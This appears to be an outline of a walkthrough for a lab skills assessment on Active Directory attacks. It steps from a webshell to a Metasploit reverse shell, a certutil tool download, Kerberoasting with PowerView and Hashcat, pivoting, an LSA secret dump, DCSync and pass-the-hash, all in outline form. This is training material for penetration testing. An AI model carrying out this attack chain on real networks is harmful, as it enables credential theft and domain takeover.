🔒

Active Directory Enumeration and Attacks - Skills Assessment Part 1

Jun 27, 2024

Active Directory Enumeration and Attacks - Skills Assessment Part 1

Overview

  • Focus on Active Directory (AD) enumeration and attacks
  • Involves extensive research and trial/error for attack path
  • Utilizes Metasploit, reverse shell, and pivoting from a Linux machine to the network
  • Complexity noted due to AD intricacies

Initial Access

Webshell

  • Start with a pre-existing webshell in the uploads directory (an AK aspx)
  • Login credentials provided: admin with a specific password
  • Webshell usability: Clear screen frequently, limited navigation
  • First task: Retrieve the contents of a flag located on the Administrator's desktop
    • Commands: type or cat to read C:\Users\Administrator\Desktop\flag.txt

Enhancing Shell Access

Metasploit Reverse Shell

  • Use Metasploit msfconsole to gain a more interactive shell
  • Set up reverse TCP payload for better access
    • Get local IP (ifconfig or equivalent command)
    • Command sequence: search web delivery, use 1, set payload options, run
    • Copy generated PowerShell command into webshell to initiate reverse shell
    • Migration to a more stable process (e.g., winlogon.exe)

Tool Upload

PowerView

  • Obtain PowerView script for AD enumeration
    • Use wget to download PowerView
    • Start a Python HTTP server to serve the script
    • Use certutil.exe on the target machine to download the script
    • Verification: Check directory for PowerView.ps1

Active Directory Enumeration

PowerShell Commands

  • Import and execute PowerView script to list domain users
    • Main command: Get-DomainUser -SPN
    • Identify specific user by their service principal name (SPN)
  • Generate and format SPN ticket for cracking
    • Export ticket to Hashcat-compatible format
    • Use Hashcat to crack the ticket and retrieve the password

Pivoting and Network Scanning

Using Metasploit and ProxyChains

  • Set up pivoting to access internal AD network via proxychains and Metasploit
  • Run Autoroute to add AD network route to Metasploit
  • Use auxiliary port scanner to identify machines within the network

Exploiting AD Network

CrackMapExec and LSA Dump

  • Use CrackMapExec to verify SMB and dump LSA secrets for user and clear text passwords
    • Target machine: Identify based on port scanner results
    • Extract necessary credentials

DC Sync Attack

  • Utilize SecretsDump.py for a DC Sync attack to get administrator's hash
    • Use cracked user's credentials
    • Retrieve necessary hashes

Final Access and Flag Capture

  • Use wmiexec.py with administrator hash to connect
  • Verify administrator access and retrieve final flag
    • Use type command to read flag on remote server

Summary

  • Method involved pivoting, tool uploads, enumeration, and exploitation
  • Demonstrated approach for gaining AD administrator access through multiple attack stages

Full transcript